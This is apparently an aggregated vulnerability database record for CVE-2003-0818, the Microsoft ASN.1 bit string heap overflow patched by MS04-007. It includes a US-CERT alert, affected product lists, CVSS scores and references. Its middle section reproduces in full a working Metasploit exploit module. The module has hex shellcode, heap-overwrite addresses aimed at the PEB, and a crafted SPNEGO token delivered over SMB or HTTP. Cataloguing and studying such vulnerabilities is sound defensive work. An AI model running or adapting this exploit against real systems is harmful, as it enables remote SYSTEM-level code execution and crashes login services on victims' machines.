ID

VAR-200403-0051


CVE

CVE-2003-0818


TITLE

Microsoft ASN.1 Library improperly decodes constructed bit strings

Trust: 0.8

sources: CERT/CC: VU#583108

DESCRIPTION

Multiple integer overflows in the Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings.

The Microsoft Windows ASN.1 Library (msasn1.dll) has an integer overflow vulnerability through which arbitrary code may be executed remotely. A remote third party may execute arbitrary code with SYSTEM privileges; as a result, it is possible to gain administrative privileges on vulnerable systems.

The issue presents itself in the ASN.1 bit string decoding routines, specifically the BERDecBitString() function. It manifests when the affected function attempts to process a constructed bit string that contains another nested constructed bit string. This vulnerability is exposed in a number of security-related operating system components, including Kerberos (via UDP port 88), Microsoft IIS with SSL support enabled, and NTLMv2 authentication (via TCP ports 135, 139 and 445). Other components may also be affected, though a comprehensive list is not available at this time. Client applications that use the library will be affected, including LSASS.EXE and CRYPT32.DLL (and any application that relies on CRYPT32.DLL). The vulnerable library is used frequently in components that handle certificates, such as Internet Explorer and Outlook. Handling of signed ActiveX components could also present an exposure. It should be noted that because ASN.1 data will likely be encoded, for example within Kerberos, SSL, IPSec or Base64, the malicious integer values may be obfuscated and as a result not easily detectable.
Issues related to this vulnerability were originally covered in BID 9626 and 9743; further information has since been made available which identifies this as a distinct vulnerability in the library, so this specific issue has been assigned an individual BID. ** June 5, 2005 Update: An IRC bot style tool may be exploiting this vulnerability. This alert will be updated as further information becomes available. This issue is related to insufficient checking of data supplied via an externally supplied length field in ASN.1 BER encoded data. This could result in an excessive value being used in a heap allocation routine, allowing large amounts of heap memory to be corrupted. This could be leveraged to corrupt sensitive values in memory, resulting in execution of arbitrary code. Exploitation of this issue will result in the corruption of heap-based management structures, and may ultimately be leveraged by an attacker to have arbitrary code executed in the context of the affected process.

The Metasploit Framework module (exploit/windows/smb/ms04_007_killbill) as distributed:

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::SMB

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft ASN.1 Library Bitstring Heap Overflow',
      'Description'    => %q{
          This is an exploit for a previously undisclosed vulnerability
        in the bit string decoding code in the Microsoft ASN.1 library. Both
        vulnerabilities were fixed in the MS04-007 patch.

        You are only allowed one attempt with this vulnerability. If the
        payload fails to execute, the LSASS system service will crash and
        the target system will automatically reboot itself in 60 seconds.

        If the payload succeeds, the system will no longer be able to
        process authentication requests, denying all attempts to login
        through SMB or at the console. A reboot is required to restore
        proper functioning of an exploited system.

        This exploit has been successfully tested with the win32/*/reverse_tcp
        payloads, however a few problems were encountered when using the
        equivalent bind payloads. Your mileage may vary.
      },
      'Author'         =>
        [
          'Solar Eclipse <solareclipse@phreedom.org>'
        ],
      'License'        => GPL_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'CVE', '2003-0818'],
          [ 'OSVDB', '3902' ],
          [ 'BID', '9633'],
          [ 'URL', 'http://www.phreedom.org/solar/exploits/msasn1-bitstring/'],
          [ 'MSB', 'MS04-007'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'           => 1024,
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed)
            {
              'Platform' => 'win',
            },
          ],
        ],
      'DisclosureDate' => 'Feb 10 2004',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('PROTO', [ true, "Which protocol to use: http or smb", 'smb']),
      ], self.class)
  end

  # This exploit is too destructive to use during automated exploitation.
  # Better Windows-based exploits exist at this time (Sep 2006)
  def autofilter
    false
  end

  # This is a straight port of Solar Eclipse's "kill-bill" exploit, published
  # as a Metasploit Framework module with his permission. This module is only
  # licensed under GPLv2, keep this in mind if you embed the Framework into
  # a non-GPL application.
  #   -hdm[at]metasploit.com

  def exploit

    # The first stage shellcode fixes the PEB pointer and cleans the heap
    stage0 =
      "\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+
      "\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+
      "\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+
      "\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+
      "\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+
      "\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+
      "\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+
      "\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+
      "\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+
      "\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+
      "\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+
      "\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+
      "\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+
      "\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+
      "\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+
      "\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+
      "\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+
      "\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+
      "\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+
      "\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+
      "\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+
      "\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+
      "\x08\x00\xeb\xfe"

    token = spnego_token(stage0, payload.encoded)

    case datastore['PROTO']
    when 'smb'
      exploit_smb(token)
    when 'http'
      exploit_http(token)
    else
      print_status("Invalid application protocol specified, use smb or http")
    end
  end

  def exploit_smb(token)
    connect
    client = Rex::Proto::SMB::Client.new(sock)

    begin
      client.session_request(smb_hostname()) if not datastore['SMBDirect']
      client.negotiate
      client.session_setup_ntlmv2_blob(token)
    rescue => e
      if (e.to_s =~ /error code 0x00050001/)
        print_status("The target system has already been exploited")
      else
        print_status("Error: #{e}")
      end
    end

    handler
    disconnect
  end

  def exploit_http(token)
    connect
    req  = "GET / HTTP/1.0\r\n"
    req << "Host: #{ datastore['RHOST']}\r\n"
    req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n"
    sock.put(req)
    res = sock.get_once

    if (res and res =~ /0x80090301/)
      print_status("This server does not support the Negotiate protocol or has already been exploited")
    end

    if (res and res =~ /0x80090304/)
      print_status("This server responded with error code 0x80090304 (wth?)")
    end

    handler
    disconnect
  end

  # Returns an ASN.1 encoded string
  def enc_asn1(str)
    Rex::Proto::SMB::Utils::asn1encode(str)
  end

  # Returns an ASN.1 encoded bit string with 0 unused bits
  def enc_bits(str)
    "\x03" + enc_asn1("\x00" + str)
  end

  # Returns a BER encoded constructed bit string
  def enc_constr(*str_arr)
    "\x23" + enc_asn1(str_arr.join(''))
  end

  # Returns a BER encoded SPNEGO token
  def spnego_token(stage0, stage1)

    if !(stage0 and stage1)
      print_status("Invalid parameters passed to spnego_token")
      return
    end

    if (stage0.length > 1032)
      print_status("The stage 0 shellcode is longer than 1032 bytes")
      return
    end

    tag = "\x90\x42\x90\x42\x90\x42\x90\x42"

    if ((tag.length + stage1.length) > 1033)
      print_status("The stage 1 shellcode is too long")
      return
    end

    # The first two overwrites must succeed, so we write to an unused location
    # in the PEB block. We don't care about the values, because after this the
    # doubly linked list of free blocks is corrupted and we get to the second
    # overwrite which is more useful.
    fw = "\xf8\x0f\x01\x00" # 0x00010ff8
    bk = "\xf8\x0f\x01"

    # The second overwrite writes the address of our shellcode into the
    # FastPebLockRoutine pointer in the PEB
    peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB

    bitstring =
      enc_constr(
        enc_bits("A" * 1024),
        "\x03\x00",
        enc_constr(
          enc_bits(tag + stage1 + ("B" * (1033-(tag+stage1).length))),
          enc_constr(
            enc_bits(fw + bk)
          ),
          enc_constr(
            enc_bits("CCCC" + peblock + stage0 + ("C" * (1032-stage0.length))),
            enc_constr(
              enc_bits("\xeb\x06" + make_nops(6)),
              enc_bits("D" * 1040)
            )
          )
        )
      )

    token =
      "\x60" + enc_asn1(                           # Application Constructed Object
        "\x06\x06\x2b\x06\x01\x05\x05\x02" +       # SPNEGO OID
        "\xa0" + enc_asn1(                         # NegTokenInit (0xa0)
          "\x30" + enc_asn1(
            "\xa1" + enc_asn1(
              bitstring
            )
          )
        )
      )

    return token
  end

end

US-CERT Technical Cyber Security Alert TA04-041A (PGP-signed original):

Multiple Vulnerabilities in Microsoft ASN.1 Library

Original issue date: February 10, 2004
Last revised: --
Source: US-CERT

A complete revision history is at the end of this document.

According to information from eEye Digital Security, the vulnerabilities involve integer overflows and other flaws in integer arithmetic. Any application that loads the ASN.1 library could serve as an attack vector. In particular, ASN.1 is used by a number of cryptographic and authentication services such as digital certificates (x.509), Kerberos, NTLMv2, SSL, and TLS. Both client and server systems are affected. The Local Security Authority Subsystem (lsass.exe) and a component of the CryptoAPI (crypt32.dll) use the vulnerable ASN.1 library.

Solution

Apply a patch

Apply the appropriate patch as specified by Microsoft Security Bulletin MS04-007.

Vendor Information

This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments.

Microsoft

Please see Microsoft Security Bulletin MS04-007.

References

* Vulnerability Note VU#216324 - <http://www.kb.cert.org/vuls/id/216324>
* Vulnerability Note VU#583108 - <http://www.kb.cert.org/vuls/id/583108>
* eEye Digital Security Advisory AD20040210 - <http://www.eeye.com/html/Research/Advisories/AD20040210.html>
* eEye Digital Security Advisory AD20040210-2 - <http://www.eeye.com/html/Research/Advisories/AD20040210-2.html>
* Microsoft Security Bulletin MS04-007 - <http://microsoft.com/technet/security/bulletin/MS04-007.asp>
* Microsoft Knowledge Base Article 252648 - <http://support.microsoft.com/default.aspx?scid=252648>

These vulnerabilities were researched and reported by eEye Digital Security. Information from eEye and Microsoft was used in this document.

Feedback can be directed to the author, Art Manion.

Copyright 2004 Carnegie Mellon University.

Revision History

February 10, 2004: Initial release

Trust: 4.14

sources: NVD: CVE-2003-0818 // CERT/CC: VU#583108 // CERT/CC: VU#216324 // JVNDB: JVNDB-2004-000037 // BID: 13300 // BID: 9633 // BID: 9635 // VULMON: CVE-2003-0818 // PACKETSTORM: 83044 // PACKETSTORM: 32667

AFFECTED PRODUCTS

vendor: microsoft  model: -  scope: -  version: -

Trust: 1.6

vendor: microsoft  model: windows 2003 server  scope: eq  version: r2

Trust: 1.0

vendor: microsoft  model: windows 2000  scope: eq  version: *

Trust: 1.0

vendor: microsoft  model: windows 2003 server  scope: eq  version: standard

Trust: 1.0

vendor: microsoft  model: windows xp  scope: eq  version: *

Trust: 1.0

vendor: microsoft  model: windows 2003 server  scope: eq  version: web

Trust: 1.0

vendor: microsoft  model: windows 2003 server  scope: eq  version: enterprise

Trust: 1.0

vendor: microsoft  model: windows nt  scope: eq  version: 4.0

Trust: 1.0

vendor: microsoft  model: windows 2003 server  scope: eq  version: enterprise_64-bit

Trust: 1.0

vendor: yahoo  model: messenger  scope: eq  version: 5.6.0.1358

Trust: 0.9

vendor: yahoo  model: messenger  scope: eq  version: 5.6.0.1356

Trust: 0.9

vendor: yahoo  model: messenger  scope: eq  version: 5.6.0.1355

Trust: 0.9

vendor: yahoo  model: messenger  scope: eq  version: 5.6.0.1351

Trust: 0.9

vendor: yahoo  model: messenger  scope: eq  version: 5.6.0.1347

Trust: 0.9

vendor: yahoo  model: messenger  scope: eq  version: 5.6

Trust: 0.9

vendor: vandyke  model: securecrt  scope: eq  version: 4.0.5

Trust: 0.9

vendor: vandyke  model: securecrt  scope: eq  version: 4.0.4

Trust: 0.9

vendor: vandyke  model: securecrt  scope: eq  version: 4.0.3

Trust: 0.9

vendor: vandyke  model: securecrt  scope: eq  version: 4.0.2

Trust: 0.9

vendor: vandyke  model: securecrt  scope: eq  version: 4.0.1

Trust: 0.9

vendor: microsoft  model: windows xp professional sp1  scope: -  version: -

Trust: 0.9

vendor: microsoft  model: windows xp professional  scope: -  version: -

Trust: 0.9

vendor: microsoft  model: windows xp home sp1  scope: -  version: -

Trust: 0.9

vendor: microsoft  model: windows xp home  scope: -  version: -

Trust: 0.9

vendor: microsoft  model: windows xp 64-bit edition version sp1  scope: eq  version: 2003

Trust: 0.9

vendor: microsoft  model: windows xp 64-bit edition version  scope: eq  version: 2003

Trust: 0.9

vendor: microsoft  model: windows xp 64-bit edition sp1  scope: -  version: -

Trust: 0.9

vendor: microsoft  model: windows xp 64-bit edition  scope: -  version: -

Trust: 0.9

vendor: microsoft  model: windows server web edition  scope: eq  version: 2003

Trust: 0.9

vendor: microsoft  model: windows server standard edition  scope: eq  version: 2003

Trust: 0.9

vendor: microsoft  model: windows server enterprise edition itanium  scope: eq  version: 20030

Trust: 0.9

vendor: microsoft  model: windows server enterprise edition  scope: eq  version: 2003

Trust: 0.9

vendor: microsoft  model: windows server datacenter edition itanium  scope: eq  version: 20030

Trust: 0.9

vendor: microsoft  model: windows server datacenter edition  scope: eq  version: 2003

Trust: 0.9

vendor: microsoft  model: windows nt workstation sp6a  scope: eq  version: 4.0

Trust: 0.9

vendor: microsoft  model: windows nt workstation sp6  scope: eq  version: 4.0

Trust: 0.9

vendor: microsoft  model: windows nt workstation sp5  scope: eq  version: 4.0

Trust: 0.9

vendor: microsoft  model: windows nt workstation sp4  scope: eq  version: 4.0

Trust: 0.9

vendor: microsoft  model: windows nt workstation sp3  scope: eq  version: 4.0

Trust: 0.9

vendor: microsoft  model: windows nt workstation sp2  scope: eq  version: 4.0

Trust: 0.9

vendor: microsoft  model: windows nt workstation sp1  scope: eq  version: 4.0

Trust: 0.9

vendor: microsoft  model: windows nt workstation  scope: eq  version: 4.0

Trust: 0.9

vendor: microsoft  model: windows nt terminal server sp6  scope: eq  version: 4.0

Trust: 0.9

vendor: microsoft  model: windows nt terminal server sp5  scope: eq  version: 4.0

Trust: 0.9

vendor: microsoft  model: windows nt terminal server sp4  scope: eq  version: 4.0

Trust: 0.9

vendor: microsoft  model: windows nt terminal server sp3  scope: eq  version: 4.0

Trust: 0.9

vendor: microsoft  model: windows nt terminal server sp2  scope: eq  version: 4.0

Trust: 0.9

vendor: microsoft  model: windows nt terminal server sp1  scope: eq  version: 4.0

Trust: 0.9

vendor: microsoft  model: windows nt terminal server  scope: eq  version: 4.0

Trust: 0.9

vendor: microsoft  model: windows nt server sp6a  scope: eq  version: 4.0

Trust: 0.9

vendor: microsoft  model: windows nt server sp6  scope: eq  version: 4.0

Trust: 0.9

vendor: microsoft  model: windows nt server sp5  scope: eq  version: 4.0

Trust: 0.9

vendor: microsoft  model: windows nt server sp4  scope: eq  version: 4.0

Trust: 0.9

vendor: microsoft  model: windows nt server sp3  scope: eq  version: 4.0

Trust: 0.9

vendor: microsoft  model: windows nt server sp2  scope: eq  version: 4.0

Trust: 0.9

vendor: microsoft  model: windows nt server sp1  scope: eq  version: 4.0

Trust: 0.9

vendor: microsoft  model: windows nt server  scope: eq  version: 4.0

Trust: 0.9

vendor: microsoft  model: windows 98se  scope: -  version: -

Trust: 0.9

vendor: microsoft  model: windows  scope: eq  version: 98

Trust: 0.9

vendor: microsoft  model: windows server sp4  scope: eq  version: 2000

Trust: 0.9

vendor: microsoft  model: windows server sp3  scope: eq  version: 2000

Trust: 0.9

vendor: microsoft  model: windows server sp2  scope: eq  version: 2000

Trust: 0.9

vendor: microsoft  model: windows server sp1  scope: eq  version: 2000

Trust: 0.9

vendor: microsoft  model: windows server  scope: eq  version: 2000

Trust: 0.9

vendor: microsoft  model: windows professional sp4  scope: eq  version: 2000

Trust: 0.9

vendor: microsoft  model: windows professional sp3  scope: eq  version: 2000

Trust: 0.9

vendor: microsoft  model: windows professional sp2  scope: eq  version: 2000

Trust: 0.9

vendor: microsoft  model: windows professional sp1  scope: eq  version: 2000

Trust: 0.9

vendor: microsoft  model: windows professional  scope: eq  version: 2000

Trust: 0.9

vendor: microsoft  model: windows advanced server sp4  scope: eq  version: 2000

Trust: 0.9

vendor: microsoft  model: windows advanced server sp3  scope: eq  version: 2000

Trust: 0.9

vendor: microsoft  model: windows advanced server sp2  scope: eq  version: 2000

Trust: 0.9

vendor: microsoft  model: windows advanced server sp1  scope: eq  version: 2000

Trust: 0.9

vendor: microsoft  model: windows advanced server  scope: eq  version: 2000

Trust: 0.9

vendor: intuit  model: quicken  scope: eq  version: 2003

Trust: 0.9

vendor: aol  model: instant messenger  scope: eq  version: 5.2.3292

Trust: 0.9

vendor: aol  model: instant messenger  scope: eq  version: 5.1.3036

Trust: 0.9

vendor: aol  model: instant messenger  scope: eq  version: 5.0.2938

Trust: 0.9

vendor: microsoft  model: windows 2000  scope: -  version: -

Trust: 0.8

vendor: microsoft  model: windows nt  scope: eq  version: 4.0 (server)

Trust: 0.8

vendor: microsoft  model: windows nt  scope: eq  version: 4.0 (terminal_srv)

Trust: 0.8

vendor: microsoft  model: windows nt  scope: eq  version: 4.0 (workstation)

Trust: 0.8

vendor: microsoft  model: windows server 2003  scope: eq  version: none

Trust: 0.8

vendor: microsoft  model: windows server 2003  scope: eq  version: (x64)

Trust: 0.8

vendor: microsoft  model: windows xp  scope: eq  version: (x64)

Trust: 0.8

vendor: microsoft  model: windows xp  scope: eq  version: sp3

Trust: 0.8

vendor: yahoo  model: messenger  scope: eq  version: 5.5.1249

Trust: 0.6

vendor: yahoo  model: messenger  scope: eq  version: 5.5

Trust: 0.6

vendor: musicmatch  model: jukebox  scope: eq  version: 8.2

Trust: 0.6

vendor: musicmatch  model: jukebox  scope: eq  version: 8.1

Trust: 0.6

vendor: musicmatch  model: jukebox  scope: eq  version: 8.0

Trust: 0.6

vendor: jasc  model: software paintshop pro  scope: eq  version: 8.10

Trust: 0.6

vendor: jasc  model: software paintshop pro  scope: eq  version: 8.01

Trust: 0.6

vendor: jasc  model: software paintshop pro  scope: eq  version: 8.00

Trust: 0.6

vendor: jasc  model: software paintshop pro  scope: eq  version: 7.04

Trust: 0.6

vendor: jasc  model: software paintshop pro  scope: eq  version: 7.02

Trust: 0.6

vendor: jasc  model: software paintshop pro  scope: eq  version: 7.01

Trust: 0.6

vendor: jasc  model: software paintshop pro  scope: eq  version: 7.0

Trust: 0.6

vendor: jasc  model: software paintshop pro  scope: eq  version: 6.02

Trust: 0.6

vendor: jasc  model: software paintshop pro  scope: eq  version: 6.01

Trust: 0.6

vendor: jasc  model: software paintshop pro  scope: eq  version: 6.0

Trust: 0.6

vendor: jasc  model: software paintshop pro  scope: eq  version: 5.03

Trust: 0.6

vendor: jasc  model: software paintshop pro  scope: eq  version: 5.01

Trust: 0.6

vendor: jasc  model: software paintshop pro  scope: eq  version: 5.0

Trust: 0.6

vendor: intuit  model: turbotax  scope: eq  version: 2003

Trust: 0.6

vendor: aol  model: instant messenger beta  scope: eq  version: 5.5.3415

Trust: 0.6

vendor: altova  model: xmlspy professional edition r2  scope: eq  version: 2004

Trust: 0.6

vendor: altova  model: xmlspy professional edition  scope: eq  version: 2004

Trust: 0.6

vendor: altova  model: xmlspy home edition r2  scope: eq  version: 2004

Trust: 0.6

vendor: altova  model: xmlspy home edition  scope: eq  version: 2004

Trust: 0.6

vendor: altova  model: xmlspy enterprise edition r2  scope: eq  version: 2004

Trust: 0.6

vendor: altova  model: xmlspy enterprise edition  scope: eq  version: 2004

Trust: 0.6

vendor: adobe  model: acrobat  scope: eq  version: 6.0

Trust: 0.6

vendor: adobe  model: acrobat  scope: eq  version: 5.0.5

Trust: 0.6

vendor: adobe  model: acrobat  scope: eq  version: 5.0

Trust: 0.6

vendor: microsoft  model: windows 2000  scope: eq  version: sp1

Trust: 0.6

vendor: microsoft  model: windows 2000  scope: eq  version: sp3

Trust: 0.6

vendor: microsoft  model: windows 2000  scope: eq  version: professional

Trust: 0.6

vendor: microsoft  model: windows 2000  scope: eq  version: server

Trust: 0.6

vendor: microsoft  model: windows 2000  scope: eq  version: advanced_server

Trust: 0.6

vendor: microsoft  model: windows 2000  scope: eq  version: sp2

Trust: 0.6

vendor: vandyke  model: securecrt  scope: eq  version: 3.4.8

Trust: 0.3

vendor: vandyke  model: securecrt  scope: eq  version: 3.4.7

Trust: 0.3

vendor: vandyke  model: securecrt  scope: eq  version: 3.4.6

Trust: 0.3

vendor: vandyke  model: securecrt  scope: eq  version: 3.4.5

Trust: 0.3

vendor: vandyke  model: securecrt  scope: eq  version: 3.4.4

Trust: 0.3

vendor: vandyke  model: securecrt  scope: eq  version: 3.4.3

Trust: 0.3

vendor: vandyke  model: securecrt  scope: eq  version: 3.4.2

Trust: 0.3

vendor: vandyke  model: securecrt  scope: eq  version: 3.4.1

Trust: 0.3

vendor: vandyke  model: securecrt  scope: eq  version: 3.4

Trust: 0.3

vendor: vandyke  model: securecrt  scope: eq  version: 3.3.4

Trust: 0.3

vendor: vandyke  model: securecrt  scope: eq  version: 3.3.3

Trust: 0.3

vendor: vandyke  model: securecrt  scope: eq  version: 3.3.2

Trust: 0.3

vendor: vandyke  model: securecrt  scope: eq  version: 3.3.1

Trust: 0.3

vendor: vandyke  model: securecrt  scope: eq  version: 3.3

Trust: 0.3

vendor: vandyke  model: securecrt  scope: eq  version: 3.2.2

Trust: 0.3

vendor: vandyke  model: securecrt  scope: eq  version: 3.2.1

Trust: 0.3

vendor: vandyke  model: securecrt  scope: eq  version: 3.2

Trust: 0.3

vendor: vandyke  model: securecrt  scope: eq  version: 3.1.2

Trust: 0.3

vendor: vandyke  model: securecrt  scope: eq  version: 3.1.1

Trust: 0.3

vendor: vandyke  model: securecrt  scope: eq  version: 3.1

Trust: 0.3

vendor: vandyke  model: securecrt  scope: eq  version: 3.0

Trust: 0.3

vendor: vandyke  model: securecrt  scope: eq  version: 2.4

Trust: 0.3

vendor: microsoft  model: small business server  scope: eq  version: 20000

Trust: 0.3

vendor: microsoft  model: internet explorer sp1  scope: eq  version: 6.0

Trust: 0.3

vendor: microsoft  model: internet explorer  scope: eq  version: 6.0

Trust: 0.3

vendor: microsoft  model: iis  scope: eq  version: 6.0

Trust: 0.3

vendor: microsoft  model: iis  scope: eq  version: 5.1

Trust: 0.3

vendor: microsoft  model: iis  scope: eq  version: 5.0

Trust: 0.3

vendor: microsoft  model: exchange server  scope: eq  version: 2003

Trust: 0.3

vendor: microsoft  model: exchange server sp3  scope: eq  version: 2000

Trust: 0.3

vendor: microsoft  model: exchange server sp2  scope: eq  version: 2000

Trust: 0.3

vendor: microsoft  model: exchange server sp1  scope: eq  version: 2000

Trust: 0.3

vendor: microsoft  model: exchange server  scope: eq  version: 2000

Trust: 0.3

sources: CERT/CC: VU#583108 // CERT/CC: VU#216324 // BID: 13300 // BID: 9633 // BID: 9635 // JVNDB: JVNDB-2004-000037 // CNNVD: CNNVD-200403-040 // NVD: CVE-2003-0818

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2003-0818
value: HIGH

Trust: 1.0

CARNEGIE MELLON: VU#583108
value: 27.72

Trust: 0.8

CARNEGIE MELLON: VU#216324
value: 27.72

Trust: 0.8

NVD: CVE-2003-0818
value: HIGH

Trust: 0.8

CNNVD: CNNVD-200403-040
value: HIGH

Trust: 0.6

VULMON: CVE-2003-0818
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2003-0818
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

sources: CERT/CC: VU#583108 // CERT/CC: VU#216324 // VULMON: CVE-2003-0818 // JVNDB: JVNDB-2004-000037 // CNNVD: CNNVD-200403-040 // NVD: CVE-2003-0818

PROBLEMTYPE DATA

problemtype:NVD-CWE-Other

Trust: 1.0

sources: NVD: CVE-2003-0818

THREAT TYPE

network

Trust: 0.9

sources: BID: 13300 // BID: 9633 // BID: 9635

TYPE

Boundary Condition Error

Trust: 0.9

sources: BID: 13300 // BID: 9633 // BID: 9635

CONFIGURATIONS

sources: JVNDB: JVNDB-2004-000037

EXPLOIT AVAILABILITY

sources: VULMON: CVE-2003-0818

PATCH

title: MS04-007  url: http://www.microsoft.com/technet/security/bulletin/MS04-007.mspx

Trust: 0.8

title: MS04-007  url: http://www.microsoft.com/japan/technet/security/bulletin/MS04-007.mspx

Trust: 0.8

title: -  url: https://github.com/nitishbadole/oscp-note-2

Trust: 0.1

title: OSCP  url: https://github.com/H3n2yk/OSCP

Trust: 0.1

title: -  url: https://github.com/rmsbpro/rmsbpro

Trust: 0.1

sources: VULMON: CVE-2003-0818 // JVNDB: JVNDB-2004-000037

EXTERNAL IDS

db: CERT/CC  id: VU#583108

Trust: 4.0

db: NVD  id: CVE-2003-0818

Trust: 3.5

db: CERT/CC  id: VU#216324

Trust: 2.9

db: USCERT  id: TA04-041A

Trust: 2.6

db: BID  id: 13300

Trust: 1.2

db: BID  id: 9635

Trust: 1.1

db: XF  id: 15039

Trust: 0.8

db: JVNDB  id: JVNDB-2004-000037

Trust: 0.8

db: CNNVD  id: CNNVD-200403-040

Trust: 0.6

db: BID  id: 9633

Trust: 0.3

db: EXPLOIT-DB  id: 153

Trust: 0.1

db: VULMON  id: CVE-2003-0818

Trust: 0.1

db: PACKETSTORM  id: 83044

Trust: 0.1

db: PACKETSTORM  id: 32667

Trust: 0.1

sources: CERT/CC: VU#583108 // CERT/CC: VU#216324 // VULMON: CVE-2003-0818 // BID: 13300 // BID: 9633 // BID: 9635 // JVNDB: JVNDB-2004-000037 // PACKETSTORM: 83044 // PACKETSTORM: 32667 // CNNVD: CNNVD-200403-040 // NVD: CVE-2003-0818

REFERENCES

url:http://www.kb.cert.org/vuls/id/583108

Trust: 3.2

url:http://www.us-cert.gov/cas/techalerts/ta04-041a.html

Trust: 2.5

url:http://www.kb.cert.org/vuls/id/216324

Trust: 2.0

url:http://marc.info/?l=ntbugtraq&m=107650972617367&w=2

Trust: 1.7

url:http://marc.info/?l=bugtraq&m=107643892224825&w=2

Trust: 1.7

url:http://marc.info/?l=bugtraq&m=107643836125615&w=2

Trust: 1.7

url:http://marc.info/?l=ntbugtraq&m=107650972723080&w=2

Trust: 1.7

url:https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a799

Trust: 1.7

url:https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a797

Trust: 1.7

url:https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a796

Trust: 1.7

url:https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a653

Trust: 1.7

url:https://docs.microsoft.com/en-us/security-updates/securitybulletins/2004/ms04-007

Trust: 1.7

url:http://www.microsoft.com/technet/security/bulletin/ms04-007.asp

Trust: 1.6

url:http://support.microsoft.com/default.aspx?scid=252648

Trust: 1.6

url:http://www.itu.int/itu-t/asn1/

Trust: 1.6

url:http://www.asn1.org/

Trust: 1.6

url:http://www.eeye.com/html/research/advisories/ad20040210-2.html

Trust: 1.4

url:http://www.securityfocus.com/bid/13300

Trust: 0.9

url:http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp

Trust: 0.9

url:/archive/1/354227

Trust: 0.9

url:http://www.eeye.com/html/research/advisories/ad20040210.html

Trust: 0.8

url:http://www.ciac.org/ciac/bulletins/o-065.shtml

Trust: 0.8

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2003-0818

Trust: 0.8

url:http://www.ipa.go.jp/security/ciadr/vul/20040212-asn1.html

Trust: 0.8

url:http://xforce.iss.net/xforce/xfdb/15039

Trust: 0.8

url:http://www.jpcert.or.jp/wr/2004/wr040701.txt

Trust: 0.8

url:http://www.jpcert.or.jp/at/2004/at040001.txt

Trust: 0.8

url:http://jvn.jp/cert/jvnta04-041a/

Trust: 0.8

